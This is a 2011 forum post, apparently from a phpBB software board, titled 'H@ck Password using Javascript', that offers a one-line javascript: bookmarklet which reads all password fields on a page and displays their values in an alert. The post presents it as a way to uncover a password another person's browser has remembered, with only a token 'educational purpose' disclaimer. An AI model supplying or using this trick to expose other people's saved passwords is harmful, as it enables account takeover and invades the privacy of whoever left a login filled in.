Software4uc
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
HomeHome  Latest imagesLatest images  SearchSearch  RegisterRegister  Log inLog in  

 

 H@ck Password using Javascript

Go down 
AuthorMessage
Willy_k
Super Moderator
Super Moderator
Willy_k


Posts : 59
Join date : 2011-11-28
Age : 31
Location : Abidjan/Cote d'Ivoire

H@ck Password using Javascript Empty
PostSubject: H@ck Password using Javascript   H@ck Password using Javascript EmptyWed Nov 30, 2011 1:33 am

This trick has been only tested on Firefox

[!]It is only for educationnal purpose, please don't use it for illegal act
Sometimes when you browse on Internet and we have to login in, we enter username an Password and we tick Remember Me. This option keeps your ids.
Someone can use your account but can't change your password bekoz it is in hidden dot.
This code reveal exactly the password.
Juste type it in your url address bar and Go

Code:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
You can try with Opera Mini, don't sure it will work
Back to top Go down
 
H@ck Password using Javascript
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Software4uc :: Computer Discussion-
Jump to:  
Create a forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com